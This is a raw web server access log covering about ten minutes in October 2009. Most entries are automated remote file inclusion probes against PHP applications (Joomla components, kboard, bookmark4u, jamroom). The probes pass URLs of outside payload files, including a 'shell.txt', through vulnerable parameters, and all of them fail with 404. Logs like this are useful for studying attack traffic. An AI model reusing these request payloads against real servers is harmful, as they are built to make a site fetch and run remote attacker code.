74.6.22.152 - - [06/Oct/2009:00:00:31 -0400] "GET /logs/error_log.Q109081500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.234.19.49 - - [06/Oct/2009:00:00:42 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:00:42 -0400] "GET /logs/access_log.Q109072400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:00:42 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:00:43 -0400] "GET /logs/access_log.Q109070900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:00:46 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:00:46 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:00:46 -0400] "GET /logs/access_log.Q109072400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:00:46 -0400] "GET /logs/access_log.Q109070900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:01:19 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:01:19 -0400] "GET /logs/access_log.Q109073100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:01:19 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:01:19 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
119.63.193.55 - - [06/Oct/2009:00:01:46 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
218.234.19.49 - - [06/Oct/2009:00:01:54 -0400] "GET //components/com_forum/download.php?phpbb_root_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:01:54 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:01:54 -0400] "GET /logs/access_log.Q109090100//components/com_forum/download.php?phpbb_root_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:02:00 -0400] "GET /logs/access_log.Q109072200//components/com_forum/download.php?phpbb_root_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:02:14 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:02:14 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:02:14 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:02:28 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 209 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:02:29 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:02:30 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 236 "-" "Mozilla/5.0"
68.116.55.125 - - [06/Oct/2009:00:02:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; MS-RTC LM 8; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.116.55.125 - - [06/Oct/2009:00:02:44 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; MS-RTC LM 8; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.116.55.125 - - [06/Oct/2009:00:02:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; MS-RTC LM 8; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.116.55.125 - - [06/Oct/2009:00:02:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; MS-RTC LM 8; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [06/Oct/2009:00:02:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.108.170 - - [06/Oct/2009:00:03:12 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:03:14 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:03:14 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:03:14 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:03:14 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:03:15 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:03:15 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
67.15.108.170 - - [06/Oct/2009:00:03:17 -0400] "GET /logs/access_log.Q109070100%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:03:21 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:03:21 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:03:21 -0400] "GET /logs/access_log.Q109082800%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:03:21 -0400] "GET /logs/access_log.Q109062100%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:03:23 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:03:23 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:03:23 -0400] "GET /logs/access_log.Q109082800%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:03:23 -0400] "GET /logs/access_log.Q109062100%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:03:36 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:03:36 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:03:36 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:00:03:41 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 238 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:03:54 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:03:54 -0400] "GET /logs/access_log.Q109070100%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
98.209.164.143 - - [06/Oct/2009:00:04:10 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.209.164.143 - - [06/Oct/2009:00:04:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.209.164.143 - - [06/Oct/2009:00:04:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.209.164.143 - - [06/Oct/2009:00:04:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
216.97.230.75 - - [06/Oct/2009:00:04:18 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:04:18 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:04:21 -0400] "GET /logs/access_log.Q109070100%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:04:23 -0400] "GET /logs/access_log.Q109070100%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:04:29 -0400] "GET /logs/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:04:29 -0400] "GET /errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:04:29 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:00:04:38 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:00:04:38 -0400] "GET /logs/access_log.Q109081300/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:42 -0400] "GET /logs/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:42 -0400] "GET /errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:42 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:45 -0400] "GET /logs/access_log.Q109071600%20%20/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:00:04:49 -0400] "GET /logs/access_log.Q109071400//?path%5Bdocroot%5D=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:53 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:53 -0400] "GET /errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:56 -0400] "GET /logs/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:58 -0400] "GET /errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:58 -0400] "GET /logs/access_log.Q109071600%20%20/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:58 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:04:58 -0400] "GET /logs/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:05:16 -0400] "GET /logs/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:05:16 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:05:19 -0400] "GET /errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.236.47.182 - - [06/Oct/2009:00:05:27 -0400] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.236.47.182 - - [06/Oct/2009:00:05:28 -0400] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://shell.malang.co.uk/shell.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.234.19.49 - - [06/Oct/2009:00:05:44 -0400] "GET /logs/access_log.Q109073100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:05:44 -0400] "GET /logs/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:05:44 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:00:05:48 -0400] "GET /errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:06:01 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:07:35 -0400] "GET /errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:07:35 -0400] "GET /logs/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:07:35 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:07:51 -0400] "GET /index.php?str=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:07:51 -0400] "GET /logs/index.php?str=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:07:51 -0400] "GET /logs/access_log.Q109072200/index.php?str=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:00:07:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.177.55 - - [06/Oct/2009:00:07:52 -0400] "GET /logs/access_log.Q109052800/index.php?str=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:00:08:10 -0400] "GET /logs/access_log.Q109070100//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:00:08:18 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
174.143.3.188 - - [06/Oct/2009:00:08:18 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
174.143.3.188 - - [06/Oct/2009:00:08:18 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.61 [en] (OS/2; U)"
174.143.3.188 - - [06/Oct/2009:00:08:18 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
222.122.72.216 - - [06/Oct/2009:00:08:23 -0400] "GET /errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:08:23 -0400] "GET /logs/access_log.Q109053000%20%20/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:08:23 -0400] "GET /logs/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:08:25 -0400] "GET /logs/access_log.Q109072200%20%20/index.php?str=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.15.177.55 - - [06/Oct/2009:00:08:25 -0400] "GET /logs/access_log.Q109052800%20%20/index.php?str=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:00:08:28 -0400] "GET /logs/access_log.Q109062000%20%20/errors.php?error=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:09:24 -0400] "GET /logs/access_log.Q109070100//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:35 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:35 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:35 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:37 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:37 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:37 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:39 -0400] "GET /logs/access_log.Q109090100%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:44 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:44 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:44 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:00:09:44 -0400] "GET /logs/access_log.Q109090100%20%20//components/com_forum/download.php?phpbb_root_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:44 -0400] "GET /logs/access_log.Q109090100%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
216.97.230.75 - - [06/Oct/2009:00:09:44 -0400] "GET /logs/access_log.Q109070100//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:00:09:54 -0400] "GET /logs/access_log.Q109090100%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
65.55.105.241 - - [06/Oct/2009:00:10:05 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.241 - - [06/Oct/2009:00:10:06 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64809 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.234.19.49 - - [06/Oct/2009:00:10:08 -0400] "GET /logs/access_log.Q109092200%20%20//components/com_forum/download.php?phpbb_root_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
